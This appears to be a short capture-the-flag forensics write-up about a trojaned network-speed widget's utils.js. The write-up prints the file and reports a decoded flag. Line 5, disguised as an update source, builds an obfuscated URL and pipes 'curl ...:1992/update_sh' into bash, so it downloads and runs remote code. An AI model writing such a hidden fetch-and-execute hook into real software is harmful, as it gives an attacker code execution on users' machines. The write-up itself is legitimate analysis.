

```
1 const NET_DATA_SOURCE =  
2   "awk -v OFS=, 'NR > 2 { print substr($1, 1, length($1)-1), $2, $10 }' /proc/net/dev";  
3  
4 const PLASMOID_UPDATE_SOURCE =  
5   "UPDATE_URL=$(echo $${2}$(cat /dev/urandom | fold -n 32 | tr -dc 'a-z0-9' | fold -w 32 | xargs echo) | rev | base64 -w 0); curl $UPDATE_URL:1992/update_sh | bash";  
6  
7 function parseTransferData(data) {  
8   const transferData = {};  
9  
10  for (const line of data.trim("\n").split("\n")) {  
11    const [name, rx, tx] = line.split(",");  
12  
13    if (name === "io") {  
14      continue;  
15    }  
16  
17    transferData[name] = { rx, tx };  
18  }  
19  
20  return transferData;  
21 }  
22  
23 function calcSpeedData(prevTransferData, nextTransferData, duration) {  
24   const speedData = {};  
25  
26   for (const key in nextTransferData) {  
27     if (prevTransferData[key] in prevTransferData) {  
28       const prev = prevTransferData[key];  
29       const next = nextTransferData[key];  
30       speedData[key] = {  
31         down: ((next.tx - prev.rx) * 1000) / duration,  
32         up: ((next.tx - prev.tx) * 1000) / duration,  
33         downTotal: nextTransferData[key].rx,  
34         upTotal: nextTransferData[key].tx,  
35       };  
36     }  
37   }  
38  
39   return speedData;  
40 }  
41
```

looking at the files i found a strange process for the update source executing an encrypted source in the utils.js, after decoding we see the flag `HTB{pwn3d_by_th3m3s!?`
`_1t_c4n_h4pp3n}`